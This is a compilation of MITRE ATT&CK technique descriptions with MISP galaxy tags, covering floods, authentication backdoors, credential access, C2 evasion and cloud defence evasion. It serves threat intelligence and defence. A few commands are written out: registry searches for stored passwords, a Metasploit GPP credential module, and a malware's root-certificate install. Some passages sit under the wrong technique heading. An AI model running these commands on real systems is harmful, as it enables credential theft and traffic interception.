Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Direct Network Flood - T1498.001"</code>
Adversaries may target the operating system (OS) for a DoS attack, since the OS is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.

Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods. (Citation: Arbor Annual DoS report Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server. (Citation: Cloudflare SynFlood)

ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service. (Citation: Corero SYN-ACKflood)

The tag is: `misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001"`

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Domain Controller Authentication - T1556.001

Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.

Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments. (Citation: Dell Skeleton)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001"

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Stored Data Manipulation - T1565.001

Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity. (Citation: FireEye APT38 Oct 2018) (Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001"

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Social Media Accounts - T1585.001

Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001"

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Scanning IP Blocks - T1595.001

Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. (Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE). (Citation: Microsoft COM)

Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). (Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence. (Citation: Fireeye Hunting COM June 2019) (Citation: ProjectZero File Write EoP Apr 2018)

Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: `misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1586.001"`

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## Fast Flux DNS - T1568.001

Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)

The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.
Threat Intel Vendors - T1597.001

Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures. (Citation: D3Security CTI Feeds)

Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Threat Intel Vendors - T1597.001"

Credentials in Registry - T1552.002

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab
Stored Credentials

- Local Machine Hive: `<code>reg query HKLM /f password /t REG_SZ /s</code>`
- Current User Hive: `<code>reg query HKCU /f password /t REG_SZ /s</code>`

The tag is: `misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"`

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**Domain Trust Modification - T1484.002**

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources. (Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.

The tag is: `misp-galaxy:mitre-attack-pattern="Domain Trust Modification - T1484.002"`

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Table 3256. Table References

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**Service Exhaustion Flood - T1499.002**

Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as
Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.

Another variation, known as an SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes an SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.

The tag is: `misp-galaxy:mitre-attack-pattern="Service Exhaustion Flood - T1499.002"`

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**Password Filter DLL - T1556.002**

Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)

The tag is: `misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002"`

### Transmitted Data Manipulation - T1565.002

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. (Citation: FireEye APT38 Oct 2018) (Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: `misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002"`

### Group Policy Preferences - T1552.006

Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts. (Citation: Microsoft GPP 2016)

These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public). (Citation: Microsoft GPP Key)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

- Metasploit’s post exploitation module: `<code>post/windows/gather/credentials/gpp</code>
- Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
- gpprefdecrypt.py

On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: `<code>dir /s * .xml</code>

The tag is: `misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006"

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### ARP Cache Poisoning - T1557.002

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).

The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address. Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.

An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.

The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache. (Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol. (Citation: Sans ARP Spoofing Aug 2003)

The tag is: **misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002"**

### Dynamic Data Exchange - T1559.002

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)

Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).

The tag is: **misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002"**

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Domain Generation Algorithms - T1568.002

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions. (Citation: Cybereason Dissecting DGAs) (Citation: Cisco Umbrella DGA) (Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders. (Citation: Cybereason Dissecting DGAs) (Citation: Cisco Umbrella DGA) (Citation: Talos CCleanup 2017) (Citation: Akamai DGA Mitigation)

Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control. (Citation: Talos CCleanup 2017) (Citation: FireEye POSHSPY April 2017) (Citation: ESET Sednit 2017 Activity)

The tag is: *misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002"

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Disable Cloud Logs - T1562.008

An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection.

Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)

The tag is: misp-galaxy:mitre-attack-pattern="Disable Cloud Logs - T1562.008"

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Create Cloud Instance - T1578.002

An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)

Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.

The tag is: misp-galaxy:mitre-attack-pattern="Create Cloud Instance - T1578.002"
**Code Signing Certificates - T1587.002**

Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. (Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.

Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.

The tag is: `misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1587.002"`

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**Purchase Technical Data - T1597.002**

Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.

Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim's infrastructure. (Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain...](https://attack.mitre.org/techniques/T1597))
Capabilities) and/or initial access (ex: [External Remote Services] or [Valid Accounts]).

The tag is: *misp-galaxy:mitre-attack-pattern="Purchase Technical Data - T1597.002"

### Virtual Private Server - T1583.003

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure. (Citation: TrendmicroHideoutsLease)

The tag is: *misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003"

### Install Root Certificate - T1553.004

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to
degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses `<code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code>` to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)

The tag is: `misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004"

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**Virtual Private Server - T1584.003**

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher
reputation cloud service providers as well as that added by the compromised third-party.

The tag is: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1584.003"

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**Time Based Evasion - T1497.003**

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.

Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment’s timestamp before and after execution of a sleep function. (Citation: ISACA Malware Tricks)

The tag is: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003"

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**Application Exhaustion Flood - T1499.003**

Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Application Exhaustion Flood - T1499.003"
Pluggable Authentication Modules - T1556.003

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is `pam_unix.so`, which retrieves, sets, and verifies account authentication information in `etc/passwd` and `etc/shadow`. (Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as `pam_unix.so`, can be patched to accept arbitrary adversary supplied values as legitimate credentials. (Citation: PAM Backdoor)

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords. (Citation: PAM Creds)(Citation: Apple PAM)

The tag is: `misp-galaxy:mitre-attack-pattern="Pluggable Authentication Modules - T1556.003"`

Runtime Data Manipulation - T1565.003

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user. (Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating
runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: *misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003"*

### Spearphishing via Service - T1566.003

Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: *misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003"*

Table 3274. Table References

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Table 3275. Table References
Delete Cloud Instance - T1578.003

An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.

An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives. (Citation: Mandiant M-Trends 2020)

The tag is: `misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003"`

Table 3276. Table References

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Code Signing Certificates - T1588.003

Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. (Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.

The tag is: `misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003"`

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**NTFS File Attributes - T1564.004**

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and antivirus.

The tag is: `misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004"`

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**Winlogon Helper DLL - T1547.004**

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in `<code>HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon</code>` and `<code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon</code>` are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)

- Winlogon\Notify - points to notification package DLLs that handle Winlogon events
- Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
- Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

The tag is: `misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004"`

**Table 3279. Table References**

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**Windows Credential Manager - T1555.004**

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

